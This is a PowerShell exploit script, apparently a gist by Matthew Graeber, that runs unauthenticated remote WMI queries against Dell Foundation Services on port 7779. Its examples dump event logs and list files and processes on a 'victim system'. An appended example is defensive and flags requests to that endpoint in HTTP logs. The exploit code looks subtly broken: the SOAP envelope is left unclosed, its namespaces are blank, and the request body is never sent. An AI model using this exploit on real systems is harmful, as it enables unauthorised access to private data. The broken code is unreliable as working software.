Perform unauthenticated WMI queries on a Dell Foundation Services server
function Get-DellFoundationServicesWmiObject {
<#
.SYNOPSIS

Performs a WMI query on a Dell Foundation Services server.

Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause

.DESCRIPTION

Get-DellFoundationServicesWmiObject exploits the information disclosure vulnerability described here:

This function allows you to perform unauthenticated remote WMI queries within the root/cimv2 namespace on a victim system.

.PARAMETER IPAddress

Specifies the IP address of the victim system.

.PARAMETER Query

Specifies a well-formed WMI query for objects within the root/cimv2 namespace, i.e. most Win32_* class instances.

.PARAMETER FakeNamespaceDomain

Specifies a fake SOAP namespace domain.

.EXAMPLE

Get-DellFoundationServicesWmiObject -IPAddress -Query 'SELECT * FROM Win32_NtLogEvent WHERE Logfile="System"'

Dumps the System event log.

.EXAMPLE

Get-DellFoundationServicesWmiObject -IPAddress -Query 'SELECT * FROM Win32_PingStatus WHERE Address=""'

Pings from the victim system.

.EXAMPLE

Get-DellFoundationServicesWmiObject -IPAddress -Query 'SELECT * FROM CIM_DataFile WHERE Extension="xlsx"'

Lists all .xlsx files present on the system.

.EXAMPLE

Get-DellFoundationServicesWmiObject -IPAddress -Query 'SELECT * FROM Win32_Process'

Lists all running processes.
#>

    param (
        $IPAddress,
        $Query,
        $FakeNamespaceDomain = ''
    )

    $URI = 'http://{0}:7779/Dell%20Foundation%20Services/ISystemInfoCapabilitiesApi' -f $IPAddress

    $SoapRequest = [Xml] @"
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="" xmlns:ns1="http://$FakeNamespaceDomain/" xmlns:xsd="" xmlns:xsi="" xmlns:SOAP-ENC="" SOAP-ENV:encodingStyle="">
<ns1:wmiQuery xsi:type="xsd:string">$Query</ns1:wmiQuery>
"@

    # Slightly modified code from
    $WebRequest = [Net.WebRequest]::Create($URI)
    $WebRequest.ContentType = 'text/xml; charset=utf-8'
    $WebRequest.Accept = 'text/xml'
    $WebRequest.Method = 'POST'

    $ResponseXml = $null

    try {
        $RequestStream = $WebRequest.GetRequestStream()
        $Response = $WebRequest.GetResponse()
        $ResponseStream = $Response.GetResponseStream()
        $StreamReader = [IO.StreamReader]($ResponseStream)
        $ResponseXml = [Xml] $StreamReader.ReadToEnd()
    } catch {
        throw $_
    }

    # Emit one object per WMI instance returned in the SOAP response.
    if ($ResponseXml -and ($ResponseXml.Envelope.Body.GetWmiCollectionResponse.GetWmiCollectionResult.WmiManagementItem)) {
        $WMIManagementItems = @($ResponseXml.Envelope.Body.GetWmiCollectionResponse.GetWmiCollectionResult.WmiManagementItem)

        foreach ($Object in $WMIManagementItems) {
            $Properties = @{
                ClassName = $Object.ClassName
                Endpoint = $Object.Endpoint
                Namespace = $Object.Namespace
                Properties = $Object.WmiProperties.WmiTriplet
            }

            New-Object PSObject -Property $Properties
        }
    }
}
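
On the detection side, the request built above always goes to TCP port 7779 and the same URI path, so it stands out in HTTP or proxy logs. The following is an added example, not part of the original gist: it flags log lines that hit that endpoint and marks those from a non-loopback source. The log layout (time, source IP, destination IP:port, method, URI), the function name Find-DfsWmiEndpointRequest and the sample lines are assumptions constructed for illustration.

```powershell
# Added example (not from the gist). Log layout is an assumption:
#   <time> <source IP> <destination IP:port> <method> <URI>
function Find-DfsWmiEndpointRequest {
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $true, ValueFromPipeline = $true)]
        [AllowEmptyString()]
        [String] $LogLine
    )
    process {
        # The URI is the last field, so an unencoded space in it survives the split.
        $Fields = $LogLine.Trim() -split '\s+', 5
        if ($Fields.Count -lt 5) { return }    # skip blank or malformed lines
        $Time, $Source, $Destination, $Method, $RawUri = $Fields

        # Drop the query string, then decode %20 so both spellings compare equal.
        $Path = [Uri]::UnescapeDataString($RawUri.Split('?')[0]).TrimEnd('/')
        if ($Destination -notmatch ':7779$') { return }
        if ($Path -ine '/Dell Foundation Services/ISystemInfoCapabilitiesApi') { return }

        # Requests from a non-loopback source are the ones to triage first.
        $Ip = $null
        $IsLoopback = [Net.IPAddress]::TryParse($Source, [ref] $Ip) -and
                      [Net.IPAddress]::IsLoopback($Ip)

        [PSCustomObject] @{
            Time        = $Time
            Source      = $Source
            Destination = $Destination
            Method      = $Method
            Remote      = -not $IsLoopback
        }
    }
}

# Constructed sample lines (documentation address ranges), not real traffic.
$SampleLog = @(
    '2024-01-01T10:02:11Z 127.0.0.1 127.0.0.1:7779 POST /Dell%20Foundation%20Services/ISystemInfoCapabilitiesApi'
    '2024-01-01T10:05:43Z 192.0.2.44 198.51.100.10:7779 POST /Dell%20Foundation%20Services/ISystemInfoCapabilitiesApi'
    '2024-01-01T10:05:50Z 192.0.2.44 198.51.100.10:7779 POST /dell foundation services/isysteminfocapabilitiesapi'
    '2024-01-01T10:06:02Z 192.0.2.44 198.51.100.10:80 GET /index.html'
)

# Only the two requests from 192.0.2.44 to port 7779 are reported.
$SampleLog | Find-DfsWmiEndpointRequest | Where-Object Remote
```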